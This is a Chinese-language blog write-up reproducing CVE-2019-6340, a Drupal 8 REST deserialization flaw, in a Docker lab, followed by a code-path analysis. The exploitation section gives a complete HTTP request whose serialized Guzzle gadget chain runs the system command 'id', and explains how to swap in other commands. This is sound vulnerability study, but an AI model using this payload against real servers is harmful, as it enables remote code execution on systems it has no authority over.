cve-2019-6340 drupal8 rest rce 漏洞复现

雨点打透心脏的1/2处 2021-09-01 11:02 579阅读 0赞

**目录**

0X1 漏洞概述

0X2 环境搭建

0X3 漏洞利用

0X4 漏洞分析

--------------------

### 0X1 漏洞概述 ###

Drupal官方之前更新了一个非常关键的安全补丁，修复了因为接受的反序列化数据过滤不够严格，在开启REST的Web服务拓展模块的情况下，可能导致PHP代码执行的严重安全。

根据官方公告和自身实践，8.6.x或（<8.6.10）两种情况可能导致问题出现：

*  RESTful Web Services拓展开启，并且启用了REST资源（默认配置即可），不需要区分GET，POST等方法即可完成攻击。
 *  JSON：API服务模块开启，此服务尚未分析。

漏洞影响版本：

Drupal < 8.6.10Drupal < 8.5.12

### 0X2 环境搭建 ###

使用search‍‍命令进行查找：

docker search CVE-2019-6340

![20200720165810777.jpeg][]

然后拉取第一个镜像，使用pull命令

docker pull knqyf263/cve-2019-6340

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3doYXRkYXk_size_16_color_FFFFFF_t_70][]

最后等到拉取完成

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3doYXRkYXk_size_16_color_FFFFFF_t_70 1][]

然后启动镜像，运行环境

docker run -d -p 80:80 --name Drupal8  knqyf263/cve-2019-6340

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3doYXRkYXk_size_16_color_FFFFFF_t_70 2][]

访问网站首页

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3doYXRkYXk_size_16_color_FFFFFF_t_70 3][]

### 0X3 漏洞利用 ###

访问漏洞环境并用burp抓包，将数据包改为如下payload，并发送。

POST /node/?_format=hal_json HTTP/1.1
    Host: <漏洞环境的IP:PORT>
    User-Agent:  Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
    Connection:  keep-alive
    Content-Type: application/hal+json
    Accept:  */*
    Cache-Control: no-cache
    Content-Length: 636
    
    {
      "link": [
        {
          "value": "link",
          "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
        }
      ],
      "_links": {
        "type": {
          "href": "<漏洞环境的IP:PORT>/rest/type/shortcut/default"
        }
      }
    }

request和response详细信息。其中红色方框内的“id”区域为所执行的命令，数字2则是命令的长度。如果想要执行 echo 1，则前面的数字需要改成 6  
![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L251bGxuYW1lMDM5Ng_size_16_color_FFFFFF_t_70][]

### 0X4 漏洞分析 ###

官方公告中(现已修正)一开始仅仅说开启POST/PATCH两种请求方式才会收到攻击，其实并不区分类型，上图就是GET请求的攻击，因为程序在进入在对请求进行deserialize的时候，是还是通过php://input进行获取请求内容。

[![image-20190224232428879.png][]][image-20190224232428879.png 1]

跟进$request->getContent

[![image-20190224232339576.png][]][image-20190224232339576.png 1]

获得请求内容后，使用$this->serializer->decode对请求内容进行解码并赋值$unserialized。

[![image-20190225113720396.png][]][image-20190225113720396.png 1]

然后传入$this->serializer->denormalize函数，Drupal 8的Serialization API是主要基于Symfony Serializer组件，具体可参加文档。

[![serializer\_workflow.png][serializer_workflow.png]][serializer_workflow.png_serializer_workflow.png]

一路跟进直到getTypeInternalIds函数，检查url是否是网站已知的类型。

[![image-20190225115619309.png][]][image-20190225115619309.png 1]

继续跟进，真正的判断在这个位置，函数栈如下：

[![image.png][]][image.png 1]

继续跟进，将结果变量$typed\_data\_ids\['entity\_type'\]传入getEntityTypeDefinition函数，取实体的定义类型。

[![image-20190225133117060.png][]][image-20190225133117060.png 1]

继续跟进，此时$context\['target\_instance'\]中包含Drupal\\Core\\Field\\FieldItemList的实例。

[![image-20190225141824210.png][]][image-20190225141824210.png 1]

继续跟进，经过$items->appendItem()后，$context\['target\_instance'\]被重新赋值，此时包含Drupal\\link\\Plugin\\Field\\FieldType\\LinkItem的实例。

[![image.png][image.png 2]][image.png_image.png 2]

继续跟进，将$context\['target\_instance'\]中的实例赋值给$field\_item，然后调用$field\_item->setValue方法，并传入了$data。

[![image-20190225142931886.png][]][image-20190225142931886.png 1]

data的值如下：

[![image-20190225143810000.png][]][image-20190225143810000.png 1]

继续跟进setValue函数，这里的$values\['options'\]可控，找到反序列化漏洞的触发点。

[![image-20190225145134766.png][]][image-20190225145134766.png 1]

利用Drupal自带的Guzzle库，FnStream类的析构函数中包含call\_user\_func，进行利用链的构造。

[![image-20190225151230070.png][]][image-20190225151230070.png 1]

[20200720165810777.jpeg]: /images/20210728/b7cf4c0047c84d79a751c555891c39b3.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3doYXRkYXk_size_16_color_FFFFFF_t_70]: /images/20210728/aaa22dc302ab42fa9f05e1800502a1bb.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3doYXRkYXk_size_16_color_FFFFFF_t_70 1]: /images/20210728/2c01dfa6aa104ced9d5ad78dd9f4cc1f.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3doYXRkYXk_size_16_color_FFFFFF_t_70 2]: /images/20210728/e2a65d2c7f904ce1a3a10bdae962dc23.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3doYXRkYXk_size_16_color_FFFFFF_t_70 3]: /images/20210728/510e51ef52e547e4ac64247f12c2b3f2.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L251bGxuYW1lMDM5Ng_size_16_color_FFFFFF_t_70]: /images/20210728/3601a28a014c44398727ea3f5e6b7882.png
[image-20190224232428879.png]: /images/20210728/f12f36b2a0b94a61861677176dc64602.png
[image-20190224232428879.png 1]: https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/2019/02/image-20190224232428879.png
[image-20190224232339576.png]: /images/20210728/3f5112a62f5a44a3b5c85e4fe9bedbef.png
[image-20190224232339576.png 1]: https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/2019/02/image-201902242323395761.png
[image-20190225113720396.png]: /images/20210728/967ccd504aa54c9c8e22e3031ce833e1.png
[image-20190225113720396.png 1]: https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/2019/02/image-20190225113720396.png
[serializer_workflow.png]: https://imgconvert.csdnimg.cn/aHR0cHM6Ly9zZWNwdWxzZW9zcy5vc3MtY24tc2hhbmdoYWkuYWxpeXVuY3MuY29tL3dwLWNvbnRlbnQvdXBsb2Fkcy8yMDE5LzAyL3NlcmlhbGl6ZXJfd29ya2Zsb3cucG5n?x-oss-process=image/format,png
[serializer_workflow.png_serializer_workflow.png]: /images/20210728/474e3209483648dcb05bf00ace25629f.png
[image-20190225115619309.png]: /images/20210728/f944f6bbc97c4cefb5d122a245faac7d.png
[image-20190225115619309.png 1]: https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/2019/02/image-20190225115619309.png
[image.png]: /images/20210728/0a59aae085af4e8d8b00de41d63d53e6.png
[image.png 1]: https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/2019/02/image87.png
[image-20190225133117060.png]: /images/20210728/0f87cf527cc746e5a29a2d71d32b9e6e.png
[image-20190225133117060.png 1]: https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/2019/02/image-201902251331170601.png
[image-20190225141824210.png]: /images/20210728/c071ed4cca764b16afc43cb858f444ab.png
[image-20190225141824210.png 1]: https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/2019/02/image-201902251418242101.png
[image.png 2]: https://imgconvert.csdnimg.cn/aHR0cHM6Ly9zZWNwdWxzZW9zcy5vc3MtY24tc2hhbmdoYWkuYWxpeXVuY3MuY29tL3dwLWNvbnRlbnQvdXBsb2Fkcy8yMDE5LzAyL2ltYWdlODgucG5n?x-oss-process=image/format,png
[image.png_image.png 2]: /images/20210728/6fb75a0eeb2b4f70ad304f34c98b426a.png
[image-20190225142931886.png]: /images/20210728/c33dcf902dab467a8bd5e7cc8b3f03c4.png
[image-20190225142931886.png 1]: https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/2019/02/image-20190225142931886.png
[image-20190225143810000.png]: /images/20210728/1cc2c75536d14bd9b87a9f77798fc4c7.png
[image-20190225143810000.png 1]: https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/2019/02/image-201902251438100001.png
[image-20190225145134766.png]: /images/20210728/6643c6034cc9440aaf2535372b7c4013.png
[image-20190225145134766.png 1]: https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/2019/02/image-20190225145134766.png
[image-20190225151230070.png]: /images/20210728/f485d4c75e214766a1b0ad3b9e4db8a7.png
[image-20190225151230070.png 1]: https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/2019/02/image-201902251512300701.png